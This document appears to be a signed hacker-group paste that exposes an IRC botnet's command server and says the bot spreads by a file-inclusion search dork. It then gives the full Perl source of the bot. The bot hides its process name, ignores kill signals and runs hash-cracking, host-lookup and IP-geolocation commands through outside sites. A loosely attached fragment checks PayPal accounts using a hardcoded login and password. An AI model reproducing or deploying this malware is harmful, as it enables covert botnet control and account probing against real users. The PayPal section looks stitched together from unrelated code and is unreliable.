trg

1. TRG - c0li Botnet - 6/8/2012
2. 1. -----BEGIN PGP SIGNED MESSAGE-----
3. 2. Hash: RIPEMD160
4. 3.
5. 4. We, the TRG, presents a random botnet C&C
6. 5.
7. 6. Host: irc.c0li.net
8. 7. Channel: #linux
9. 8. Port: 54321
10. 9. MOA: LFI google dork to dropping a perl irc bot
11. 10. Bot: http://pastebin.com/pCajmCUq
12. 11. Shell: http://pastebin.com/1pbCEQ5A
13. 12. Website: http://c0li.blogspot.com
14. 13.
15. 14. -----BEGIN PGP SIGNATURE-----
16. 15. Version: GnuPG v2.0.17 (MingW32)
17. 16.
18. 17. iQIcBAEBAwAGBQJP0pvIAAoJEFydt9HxKF6qKMcP/i5Cq3nR0tjYP/2f9Ghjuj6n
19. 18. 8SknPm+QhYQkhehygfMydanthd6owZC6jnWAa30QPtxWEuSIdOVSpy38wQpb+9sQ
20. 19. JBEUabvFnFcXWChV3OsKK++VqqPyM/7F4GJM8syXogtFY0zLTjMxW1+WZF8QD7pe
21. 20. W/WGyjMdWIdJNtPv/W4yxylhd5WVwS3kHyPx51Es4xVDSQg5z1FQsh/DQ6yqsl2k
22. 21. wvdpxGwJtJMU/p/gJlvfnnedYY6r8oZqHc9wrCjyVeBvsv8VNKf6ZKLcwJbGkanG
23. 22. ZTIWEUCA0zzR3/PGICuO5P6QiUasM2nhdg9eLCCrSlk1mezZSEuuwiZdfC6et37o
24. 23. lj3fhaLso/5fe2HoV61FDqZIaPPi1bbVOgCmrAuHyGbiZoP06a9Wo0UZ4XZFWZVb
25. 24. 33O5LRfxHdszJr919y1ceb8ves5VBgH/Z6qJEcejIUpotAVZqozJu9BD0mL56MKP
26. 25. tDR4epX0qJXGq4pIYN4W0r8mUxXyyHb/elOaixlMlud7Tkls40TcSZ18eMFfrq72
27. 26. sAv2MiMo8PJC4A4cIpDeu+aILjoxmR+oN2a3gzWqIS4dC7kWfUr/sM7UfB0aJPJl
28. 27. 4JzT9MaqNZIeKhUtuTSjcVTcxbYQ0Bm56nXlJYdDSymzG+JzW8MakgzaydflxSkM
29. 28. fsDCzs4cCeeiRWSkt21I
30. 29. =Xyvr
31. 30. -----END PGP SIGNATURE-----
32.  
33.  
34.  
35. -----BEGIN PGP SIGNED MESSAGE-----
36. Hash: RIPEMD160
37.  
38. #!/usr/bin/perl
39.  
40. use HTTP::Request::Common qw(POST);
41. use LWP::UserAgent;
42. use IO::Socket;
43. use IO::Select;
44. use Socket;
45.  
46. my $fakeproc = $ARGV[6];
47. $ircserver = $ARGV[0] unless $ircserver;
48. my $nickname = $ARGV[2];
49. my $ident = $ARGV[3];
50. my $channel = '#'.$ARGV[4];
51. my $runner = $ARGV[5];
52. my $fullname = '15(7@2Hash Cracker15)';
53. my $ircport = $ARGV[1];
54.  
55.  
56.  
57. my $encrypt = '!enc';
58. my $decrypt = '!dec';
59. my $zipcmd = '!zip';
60. my $ipcmd = '!ip';
61.  
62. my $success = "\n [+] Hash Cracker v2.0\n [-] Loading Successfully ...\n [-] Process/PID : $fakeproc - $$\n\n";
63. my $failed = "\n [?] perl $0 <irchost> <port> <nick> <ident> <chan> <runner> <fakeproc>\n\n";
64.  
65. if (@ARGV != 7) { print $failed; exit(); } else { print $success; }
66.  
67. $SIG{'INT'} = 'IGNORE';
68. $SIG{'HUP'} = 'IGNORE';
69. $SIG{'TERM'} = 'IGNORE';
70. $SIG{'CHLD'} = 'IGNORE';
71. $SIG{'PS'} = 'IGNORE';
72.  
73. chdir("/");
74. $ircserver="$ARGV[0]" if $ARGV[0];
75. $0="$fakeproc"."\0"x16;;
76. my $pid=fork;
77. exit if $pid;
78. die "Something Wrong !!!: $!" unless defined($pid);
79.  
80. our %irc_servers;
81. our %DCC;
82. my $dcc_sel = new IO::Select->new();
83. $sel_client = IO::Select->new();
84.  
85. sub sendraw {
86. if ($#_ == '1') {
87. my $socket = $_[0];
88. print $socket "$_[1]\n";
89. } else {
90. print $IRC_cur_socket "$_[0]\n";
91. }
92. }
93.  
94. sub connector {
95. my $mynick = $_[0];
96. my $ircserver_con = $_[1];
97. my $ircport_con = $_[2];
98. my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
99. if (defined($IRC_socket)) {
100. $IRC_cur_socket = $IRC_socket;
101.  
102. $IRC_socket->autoflush(1);
103. $sel_client->add($IRC_socket);
104.  
105. $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
106. $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
107. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
108. $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
109. nick("$mynick");
110. sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname");
111. sleep 1;
112. }
113. }
114.  
115. sub parse {
116. my $servarg = shift;
117. if ($servarg =~ /^PING \:(.*)/) {
118. sendraw("PONG :$1");
119. } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
120. my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
121. if ($args =~ /^\001VERSION\001$/) {
122. notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001");
123. }
124. if ($args =~ /^(\Q$mynick\E|\!a)\s+(.*)/ ) {
125. my $natrix = $1;
126. my $arg = $2;
127. }
128. }
129. elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
130. if (lc($1) eq lc($mynick)) {
131. $mynick=$4;
132. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
133. }
134. } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
135. nick("$mynick|".int rand(999));
136. } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
137. $mynick = $2;
138. $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
139. $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
140. sendraw("MODE $nickname +Bx");
141. sendraw("JOIN $channel");
142. sendraw("PRIVMSG $channel :TempSys md5");
143. sendraw("PRIVMSG $runner :Hi $runner im here !!!");
144. }
145. }
146.  
147. my $line_temp;
148. while( 1 ) {
149. while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
150. delete($irc_servers{''}) if (defined($irc_servers{''}));
151. my @ready = $sel_client->can_read(0);
152. next unless(@ready);
153. foreach $fh (@ready) {
154. $IRC_cur_socket = $fh;
155. $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
156. $nread = sysread($fh, $msg, 4096);
157. if ($nread == 0) {
158. $sel_client->remove($fh);
159. $fh->close;
160. delete($irc_servers{$fh});
161. }
162. @lines = split (/\n/, $msg);
163. $msg =~ s/\r\n$//;
164.  
165. if ($msg=~ /PRIVMSG $channel :!help/){
166. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Help15)7 $encrypt <text> | $decrypt <hash> | $zipcmd> <us-zipcode> | $ipcmd <ip/host> | !host <ip/host> | !power | !about ");
167. }
168.  
169. if ($msg=~ /PRIVMSG $channel :!power/){
170. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Power15)12 MD5 : md5_64bit, md5_128bit, md5(md5_lcase) \& md5(md5_Ucase)");
171. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Power15)12 Sha1 : sha1_160bit");
172. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Power15)12 MySQL : MySQL_64bit \& MySQL_160bit");
173. }
174.  
175. if ($msg=~ /PRIVMSG $channel :!about/){
176. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)12 Hash Cracker v1.3");
177. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2About15)12 Coded by VopCrew");
178. }
179.  
180. if ($msg=~ /PRIVMSG $channel :!pid/){
181. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2PID15)12 Process/ID : 4 $fakeproc - $$");
182. }
183.  
184. ##################################################################### PassCracking.Com Hash Engine - Hash 2 Text
185. if ($msg=~ /PRIVMSG $channel :$decrypt\s+(.*)/ ) {
186. if (my $pid = fork) {
187. waitpid($pid, 0);
188. } else {
189. if (fork) {
190. exit;
191. } else {
192. my $hash = $1;
193. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Hack15)12 Trying to Crack7 ".$hash." 12...");
194. my $cracker = "http://passcracking.com/index.php";
195. my ($useragent,$request,$response,%form);
196. undef %form;
197. $form{datafromuser} = $hash;
198. $useragent = LWP::UserAgent->new;
199. $useragent->timeout(10);
200. $request = POST $cracker,\%form;
201. $response = $useragent->request($request);
202. if ($response->is_success) {
203. my $res = $response->content;
204. if ($res =~ m/([0-9])<\/td><td>(.*)<\/td><td>$hash<\/td><td bgcolor=#FF0000>(.*)<\/td><td>(.*)<\/td><\/tr><tr align=center onMouseOver=/g) {
205. my ($type,$result) = ($2,$3);
206. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Hack15)12 [$type]4 ".$hash." 12->3 ".$result);
207. }
208. elsif ($res =~ m/([0-9])<\/td><td>(.*)<\/td><td>$hash<\/td><td bgcolor=#FF0000>(.*)<\/td><td>/g) {
209. my ($type,$result) = ($2,$3);
210. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Hack15)12 [$type]4 ".$hash." 12->3 ".$result);
211. }
212. elsif ($res =~ m/([0-9])<\/td\><td>(.*)<\/td><td>$hash<\/td><td >[ not found ]/g) {
213. my $type = $2;
214. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Hack15)12 [PassCracking]7 [$type]4 ".$hash." 12not found.");
215. }
216. elsif ($res =~ m/Thanks for NEW pass/g) {
217. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2Hack15)12 [PassCracking]7 ".$hash." 12is unknown hash.");
218. }
219. else {
220. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 [PassCracking]7 ".$hash." 12not found.");
221. }
222. }
223. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Cannot open PassCracking.cOm"); }
224. }
225. exit;
226. }}
227.  
228. ##################################################################### GDataOnline.com MD5 Engine - Md5 2 Text
229. if ($msg=~ /PRIVMSG $channel :$decrypt\s+([0-9,a-f]{32})/ ) {
230. if (my $pid = fork) {
231. waitpid($pid, 0);
232. } else {
233. if (fork) {
234. exit;
235. } else {
236. my $hash = $1;
237. my $cracker = "http://www.gdataonline.com/qkhash.php?mode=txt&hash=".$hash;
238. my $request = HTTP::Request->new(GET=>$cracker);
239. my $useragent = LWP::UserAgent->new();
240. $useragent->timeout(10);
241. my $response = $useragent->request($request);
242. if ($response->is_success) {
243. my $res = $response->content;
244. if ($res =~ m/>$hash<\/td><td width="35%"><b>(.*)<\/b>/g) {
245. my $result = $1;
246. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 [GDataOnline]4 ".$hash." 12->3 ".$result);
247. }
248. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 [GDataOnline]4 ".$hash." 12not found."); }
249. }
250. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Cannot open GDataOnline.cOm"); }
251. }
252. exit;
253. }}
254.  
255. ##################################################################### md5.rednoize.com MD5 Engine - Md5 2 Text
256. if ($msg=~ /PRIVMSG $channel :$decrypt\s+([0-9,a-f]{32})/ ) {
257. if (my $pid = fork) {
258. waitpid($pid, 0);
259. } else {
260. if (fork) {
261. exit;
262. } else {
263. my $hash = $1;
264. my $cracker = "http://md5.rednoize.com/?s=md5&q=".$hash;
265. my $request = HTTP::Request->new(GET=>$cracker);
266. my $useragent = LWP::UserAgent->new();
267. $useragent->timeout(10);
268. my $response = $useragent->request($request);
269. if ($response->is_success) {
270. my $res = $response->content;
271. if ($res =~ m/<div id=\"result\" >(.*)<\/div>/g) {
272. my $result = $1;
273. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 [RedNoize]4 ".$hash." 12->3 ".$result);
274. }
275. else {
276. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 [RedNoize]4 ".$hash." 12not found.");
277. }
278. }
279. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Cannot open Md5.RedNoize.cOm"); }
280. }
281. exit;
282. }}
283.  
284. ##################################################################### c0li.m0de.0n MD5 Engine - Text 2 Hash
285. if ($msg=~ /PRIVMSG $channel :$encrypt\s+(.*)/ ) {
286. if (my $pid = fork) {
287. waitpid($pid, 0);
288. } else {
289. if (fork) {
290. exit;
291. } else {
292. my $teks=$1;
293. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Trying to encrypt7 ".$teks." 12...");
294. my $hashing = "http://d00r.110mb.com/hash.php?enc=".$teks;
295. my $request = HTTP::Request->new(GET=>$hashing);
296. my $useragent = LWP::UserAgent->new();
297. $useragent->timeout(10);
298. my $response = $useragent->request($request);
299. if ($response->is_success) {
300. my $res = $response->content;
301. if ($res =~ m/MD5:([0-9,a-f]{32})<br>SHA1:([0-9,a-f]{40})<br>B64:(.*)/g) {
302. my ($md5,$sha1,$base64) = ($1,$2,$3);
303. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 MD5 :4 ".$teks." 12->3 ".$md5);
304. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Sha1 :4 ".$teks." 12->3 ".$sha1);
305. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Base64 :4 ".$teks." 12->3 ".$base64);
306. }
307. }
308. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Cannot open c0li.m0de.0n"); }
309. }
310. exit;
311. }}
312.  
313. ##################################################################### www.myipneighbors.com - DOTESTBED HOSTED SCANNER
314. if ($msg=~ /PRIVMSG $channel :!host\s+(.*)/ ) {
315. if (my $pid = fork) {
316. waitpid($pid, 0);
317. } else {
318. if (fork) {
319. exit;
320. } else {
321. my $ipaddr = $1;
322. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Dotestbed in7 ".$ipaddr." 12Host ...");
323. my $hashing = "http://www.myipneighbors.com/?search=".$ipaddr."&commit=search";
324. my $res = getcontent($hashing);
325. while ($res =~ m/<tr style=\"background:#dedede;\"><td>(.*)<\/td><td>/g) {
326. my $dns1 = $1;
327. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 ".$ipaddr." 4->3 ".$dns1);
328. sleep(2);
329. }
330. while ($res =~ m/<tr style=\"background:#ffffff;\"><td>(.*)<\/td><td>/g) {
331. my $dns2 = $1;
332. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 ".$ipaddr." 4->3 ".$dns2);
333. sleep(2);
334. }
335. if ($res !~ m/<tr style=\"background:#.*;\"><td>.*<\/td><td>/g) {
336. if ($res =~ m/<b>$ipaddr<\/b> has address <b>(.*)<\/b>/g) {
337. $mydns = $1;
338. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 ".$ipaddr." 4->3 ".$mydns);
339. }
340. else {
341. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 ".$ipaddr." 7->4 Bad Dotestbed.");
342. }
343. }
344. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2TestbedHack15)12 Listing of Dotestbed in4 ".$ipaddr." 12is Done.");
345. }
346. exit;
347. }}
348.  
349. ##################################################################### US ZIP Lookup www.ZIPInfo.com
350. if ($msg=~ /PRIVMSG $channel :$zipcmd\s+(.*)/ ) {
351. if (my $pid = fork) {
352. waitpid($pid, 0);
353. } else {
354. if (fork) {
355. exit;
356. } else {
357. my $zip = $1;
358. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 Looking up7 ".$zip." 12ZIP Code ...");
359. my $website = "http://www.zipinfo.com/cgi-local/zipsrch.exe?cnty=cnty&ac=ac&zip=".$zip."&Go=Go";
360. my $request = HTTP::Request->new(GET=>$website);
361. my $useragent = LWP::UserAgent->new();
362. $useragent->timeout(10);
363. my $response = $useragent->request($request);
364. if ($response->is_success) {
365. my $res = $response->content;
366. if ($res =~ m/<td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font>/g) {
367. my ($city,$state,$zipcode,$county,$area) = ($1,$2,$3,$4,$6);
368. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 City Name :3 ".$city."");
369. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 State Code :3 ".$state."");
370. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 ZIP Code :3 ".$zipcode."");
371. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 County Name :3 ".$county."");
372. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 Area Code :3 ".$area."");
373. }
374. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)7 $zip 4is not a valid ZIP code."); }
375. }
376. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2US-ZIP15)12 Cannot open www.ZIPInfo.com"); }
377. }
378. exit;
379. }}
380.  
381. ##################################################################### IP Location - www.ipligence.com
382. if ($msg=~ /PRIVMSG $channel :$ipcmd\s+(.*)/ ) {
383. if (my $pid = fork) {
384. waitpid($pid, 0);
385. } else {
386. if (fork) {
387. exit;
388. } else {
389. my $ip = $1;
390. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 Searching7 ".$ip." 12Location ...");
391. my $website = "http://www.ipligence.com/geolocation";
392. my ($useragent,$request,$response,%form);
393. undef %form;
394. $form{ip} = $ip;
395. $useragent = LWP::UserAgent->new;
396. $useragent->timeout(10);
397. $request = POST $website,\%form;
398. $response = $useragent->request($request);
399. if ($response->is_success) {
400. my $res = $response->content;
401. if ($res =~ m/Your IP address is (.*)<br>City: (.*)<br\/>Country: (.*)<br>Continent: (.*)<br>Time/g) {
402. my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
403. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 IP Address :3 ".$ipaddress."");
404. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 City :3 ".$city."");
405. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 Country :3 ".$country."");
406. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 Continent :3 ".$continent."");
407. }
408. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)7 $ip 12-> 4Invalid address or IP not found."); }
409. }
410. else { sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2IP-Location15)12 Cannot open www.ipligence.com"); }
411. }
412. exit;
413. }}
414.  
415. for (my $c=0; $c<= $#lines; $c++) {
416. $line = $lines[$c];
417. $line=$line_temp.$line if ($line_temp);
418. $line_temp='';
419. $line =~ s/\r$//;
420. unless ($c == $#lines) {
421. parse("$line");
422. } else {
423. if ($#lines == 0) {
424. parse("$line");
425. } elsif ($lines[$c] =~ /\r$/) {
426. parse("$line");
427. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
428. parse("$line");
429. } else {
430. $line_temp = $line;
431. }
432. }
433. }
434.  
435. }}
436.  
437. sub nick {
438. return unless $#_ == 0;
439. sendraw("NICK $_[0]");
440. }
441.  
442. sub notice {
443. return unless $#_ == 1;
444. sendraw("NOTICE $_[0] :$_[1]");
445. }
446.  
447. sub getcontent() {
448. $url = $_[0];
449. my $req = HTTP::Request->new(GET => $url);
450. my $ua = LWP::UserAgent->new();
451. $ua->timeout(10);
452. my $response = $ua->request($req);
453. return $response->content;
454. }
455. ##################################################################### PP Checking
456.  
457. if($msg{'what'} =~ /\!chkpp (.*)/)
458. {
459. my ($ppchek) = ($1);
460. chop($ppchek);
461. &respond_to_privmsg(\%msg,"15[7CHECKiNGPAYPAL15] CHECKiNG... -$ppchek- ");
462. print "inizio mechanize\n";
463. my $agent = WWW::Mechanize->new( autocheck => 1 );
464. my $formfiller = WWW::Mechanize::FormFiller->new();
465. $agent->env_proxy();
466. $agent->get('https://www.paypal.com/us/verified/pal='.$ppchek.'');
467. $agent->form_number(1) if $agent->forms and scalar @{$agent->forms};
468. $agent->form_number(3);
469. { local $^W; $agent->current_form->value('login_email', 'otntguzuhj@mailinator.com'); };
470. { local $^W; $agent->current_form->value('login_password', 'kernel747'); };
471. $agent->submit();
472. $agent->follow_link('n' => 7);
473. print $agent->content,"\n";
474. my $internal=$agent->content;
475. &respond_to_privmsg(\%msg,"Email - ${ppchek} - ");
476. if ($internal =~/is NOT PayPal Verified/){
477. &respond_to_privmsg(\%msg,"PaypaL - is - 04UnVerified ");
478. }
479. if ($internal =~/<td class=\"emphasis\">(.*?)<\/td>/){
480. &respond_to_privmsg(\%msg,"PaypaL - is - 03Verified ");
481. }
482. }
483. -----BEGIN PGP SIGNATURE-----
484. Version: GnuPG v2.0.17 (MingW32)
485.  
486. iQIcBAEBAwAGBQJP0pofAAoJEFydt9HxKF6qaVcP+wfyV2ZWaw6Mtz74ZKjfHs8K
487. ijflTKWrKBGzkPEFL2KiVKsOxvOA0ypVnfxQthyCIeWwhXClWL0z1iyUTqch2muw
488. 7cSrxbNzlDe4GLU+4hDS3Q8FbjYg1ZbnR89Cf8XjMu+l7Bgwd+qgOZQqIE/fopr/
489. TK8tSNa6t8iJ4q1fXh5DLtHviRyiVX8WUa+HVQWJFvhcMb7WuakA8j3fuSuzCwcN
490. uZQQm1XNuQivuDcNZfnR9hEmBot0PpDtu96IeKaFncEHrNkqaVc4+kJT5RyDSDDf
491. tHv1BYUbvuc9P25/NQY2t9+QaBBK1oqvWTnmzYBUc/8X6Z/pLiU6win9Hnwv+w1l
492. oX164Tk5XBAQ6AAlJkVkr9DJJdLCAhgwdD2RU0NYK9a0LBaof83qynKXqBYEYXcJ
493. y4TG/w6vNIWQM2e3U1fb+0Udihp6Z6h0dJLPdzm2Aqij7irNCA1kKHRSsUHniImD
494. rKNcMmCovKhBU9fs88YwSNrJHO+knCf4xndB9KMzB98yPxwJXfSO7/Da0I8q/Scn
495. sG3foYZEk+I3e5KieKws2TXtPaq0W08LsD7LJUKBma7xkJ5ejbV6xW0teX18pxKe
496. 2j6lsQ/H/11kvgrtu3rX48uSIQ5bcNH3s9khemipd9IHDXTgimU9myQ27vk7fPqH
497. lP4jKjvjFWWo/cYzjEow
498. =2wgJ
499. -----END PGP SIGNATURE-----